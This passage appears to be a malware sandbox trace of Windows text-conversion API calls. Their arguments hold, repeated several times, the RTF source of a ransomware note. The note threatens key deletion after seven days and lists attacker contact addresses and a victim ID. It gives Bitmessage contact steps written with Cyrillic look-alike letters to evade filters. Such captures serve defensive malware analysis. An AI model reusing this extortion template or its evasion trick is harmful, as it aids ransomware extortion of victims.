INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.191] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.192] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in 